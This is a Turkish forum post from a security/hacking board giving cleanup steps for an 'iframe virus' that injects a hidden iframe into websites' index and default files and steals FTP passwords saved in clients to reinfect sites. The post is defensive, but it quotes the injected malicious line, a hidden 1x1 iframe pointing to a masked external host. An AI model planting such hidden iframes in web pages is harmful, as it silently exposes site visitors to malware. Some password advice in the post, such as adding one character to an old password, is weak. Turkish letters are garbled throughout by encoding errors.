THT DUYURU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

iframe virusunden kurtulma

PowerShot - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2010
Nereden:
İzmir
Yaş:
30
Mesajlar:
564
Konular:
261
Teşekkür (Etti):
26
Teşekkür (Aldı):
183
Ticaret:
(0) %
15-06-2010 00:17
#1
iframe virusunden kurtulma
echo "<iframe src=\"http://*****.net/?click=6068265\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
Sitedeki index.html, index.php gibi dosyalaryna bu virüsün kendini ekledi?i ve silinmesi konusunda zorluklar çykty?y yazylmy?. Benimde bir ara ba?yma gelmi?ti. R10'daki ilk makalemi de bu lanet iframe'i temizlemeye yönelik yazayym dedim.

Çe?itli versiyonlary olsa da temeli aynydyr. A?a?ydaki önerileri uygulayyp yüksek olasylykla kurtulabilirsiniz.


Dikkat : Google sitede virüsü görürse sizi hemen syralamalarda a?a?ylara atabilir. Birde aramalardaki ba?ly?yn altynda "Dikkat bu site zararlydyr" yazabilir.

Bunun Google kaynakly kullanycy sayysyna büyük darbe indirece?i a?ikardyr.

Bu virüs nedir, ne yapar?

!!! - index.html, index.php gibi index adly dosyalaryna bu virüsün yukarydaki gibi iframe kodu ekler. Bu kod virüsün yayylmasyny sa?lar. Yndex dosyalaryny görüntüleyen herkese virüs bula?yr.

******Gelen bir uyaryyy ekleyeyim istedim makaleye.

Virüsün yeni versiyonu default.html, default.php ve di?er default adly dosyalara da bula?yyormu? e?er varsa bunlary da temizleyiniz.

!!! - Ftp programlaryndaki kayytly ?ifreleri alarak siz virüsü bilgisayardan ve FTP'nizden sildi?inizde kendini yeniden ekler. (Özellikle CuteFTP varsa)

!!! - Bir çok antivirüs programyny atlatmaktadyr. Uyary veriyorlar ama hayyr diyene kadar çoktan yazylmy? oluyor bilgisayarda gerekli yerlere.
!!! - Bir versiyonunun bilgisayardaki olan index.php vs dosyalaryna da bula?abildi?i söyleniyor.

Virüs bula?ty, nasyl kurtulunabilir?

1 - Virüsü kapty?ynyzy anlady?ynyzda internet ba?lantynyzy virüsü silinceye kadar kapatyn. FTP programlarynda kayytly ?ifreniz varsa saniyeler içerisinde yayylmaya ba?lyyor. E?er kayytly ?ifre yoksa FTP'ye bula?myyor, sadece bilgisayary etkiliyor.

2 - Antivirüs ve spyware taramasy yaptyryn. Örn; Son güncelli?iyle bir Kaspersky ve Spy Sweeper tavsiyem. Yoksa ücretsiz AVG ile Ad-aware'yi deneyin. Taramada çykanlary temizleyin ama bitmedi.

Muhtemel virüs çykabilecek yerlere bakyn. A?a?ydaki klasörlere gelip de?i?tirme tarihine göre dosyalary syralarsanyz kalmy?sa virüs exelerini görebilirsiniz.Sabit bir ismi yok her geldi?inde rastgele bir isim alyyor exeler. Çok emin de?ilseniz silmeyin. Silinmezse bilgisayary güvenli modda açyp silin.
Alynty:
Masaüstü
Windows
Windows\system32
********s and Settings\Kullanycy Adynyz\Local Settings
********s and Settings\Kullanycy Adynyz\\Local Settings\Application Data


3 - CuteFTP tarzy programlarydaki kayytly ?ifreleri silin. Mesela kullanycy ady ve ftp adresi kalyr. ?ifreyi yanly? yazarsanyz her açyly?ta ?ifreyi sorar, bu a?amada birazdan yeni belirleyebilece?imiz ?ifreyi yazyn.


4 - Virüs temizli?ini yapty?ynyza eminseniz internet ba?lantynyzy açyn.

?YMDY TARAYICIYLA HYÇ BYR SYTEYE GYRMEYYN. KENDY SYTENYZ DAHYL. Çünkü virüsü son kapty?ynyz site ya da virüsün yeni bula?ty?yny sitelerinizden hemen tekrar alabilirsiniz virüsü.
(tabi güvenilir siteler hariç google vs. ama ?u anda amaç virüsü temizlemek )

Sitenizin FTP ?ifrenizi cPanel'den veya di?er admin yönetim paneline girerek de?i?tirin. Bunu yaparken siteniz.com/cpanel veya nasyl giriyorsanyz o ?ekilde girin. Virüs bula?an sitelerin anasayfalary görüntülemekten kaçynyn.

?imdi ben ?ifremi çok severim ama yeni ?ifre napacam diye dü?ünüyorsanyz fazla dü?ünmeyin ola?an ?ifrenizin sonuna "?" gibi özel bir karakter, bir harf ya da bir rakam ekleyin, geçin.
Ama FTP ?ifrelerinizde hem harf hem rakam hemde /%'!^%(!/ tarzy özel karakterlerin ve en az 8-10 hane olmasy güvenlik açysyndan önemlidir. (Örn; 4!6k5+a%ak)

5 - ?ifreyi de?i?tirdik. Bilgisayarymyz temiz, FTP ?ifremiz de?i?ti. Ama virüs hala sitemizde. FTP'ye girin tabi ?ifreyi kaydetmeden. index.html, index.php, index.xxx tarzy tüm dosyalary açyp en üstteki kodun benzerini arayyn bulun ve silin.

E?er dosyalarynyz çoksa ücretsiz NOTEPAD2'yi kullanyp silmekte hyz kazanabilirsiniz. Virüsün bula?ty?y bir index dosyasyndan kodu kopyalayyn. Daha sonra Notepad2'de Edit > Replace (Ctrl+H kysayolu)'i açyn.
Search String yazan yere kodu yazyn, alt tarafy ayny ?ekilde bo? byrakyn ve Replace All'a tyklayyn.Kod silindi. Bilgisayarynyzdaki dosyalara bula?my?sa index diye aratyn çykan her dosyayy bu ?ekilde temizleyin.
E?er bilgisayarynyzda sitenizin temiz yede?i varsa direk üstüne atabilirsiniz. Ama bitmedi okumaya devam edin.

Dikkat : Hosttaki sadece www veya public_html dizinleri de?il hosttaki di?er index dosyalaryna da bula?yyor. Bu dizinleri de tarayyp index.xxx dosyalaryndan silin.

örne?in; /tmp/webalizerftp ve /tmp/webalizer'deki index.html dosyalary.

6 - ?imdi bilgisayarymyzda virüs yok, bilgisayardaki dosyalarymyzda virüs yok. ftp ?ifremiz de?i?ti, siteden de virüs yok.

Kysacasy ?u anda bu virüsten etkilenmeyen birisiyle ayny durumda olmalysynyz.

Dikkat : E?er bu adymlary tam olarak yapty?ynyz halde i?e yaramadyysa bilgisayarynyza format atyp, hostunuzun syfyrlanmasyny sa?layyp(hesabyn kapatyp tekrar açylmasy), sitenizi syfyrdan tekrar kurmayy deneyiniz.


Bu virüse kar?y önlemler nelerdir?

!!! - Benim ba?yma gelmez demeyin, önlem alyn. Hergün girdi?iniz, aylarca virüssüz yayyn yapan birisi virüsü kapar ve hemen sizi de etkileyebilir.

!!! - Kesinlikle FTP ?ifrelerinizi programlarda byrakmayyn. ?ifreleri aklynyzda tutamyyorsanyz bir ka?yda,cep telefonunuza yazyn. E?er virüs girerde ?ifre de?i?tirmek zorunda kalyrsanyz sürekli kullandy?ynyz ?ifrenin sonuna bir iki karakter daha eklemeniz yeterlidir, daha kolay ezberlersiniz. abc123 ?ifrense abc123? yapmak gibi...


!!! - Düzenli yedek alyn. Site ve scriptlerinizin son hallerinin yedeklerini bulundurun. ?ifreli RAR dosyalarynda veya DVD'lerde tutun. Olaki bir olay oldu hemen yedekleri yükleyerek müdahale edebilirsiniz. Di?er türlü uzun u?ra?lar gerekiyor.

!!! - Ynternette dola?yrken en azyndan güncellenmi? bir antivirüs programy bulundurun. Ek olarak anti-spyware programy da size yardymcy olacaktyr. Ücretli olarak Kaspersky ve Spy Sweeper. Ücretsiz olarakta AVG Free ve Ad-Aware kullanabilirsiniz.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler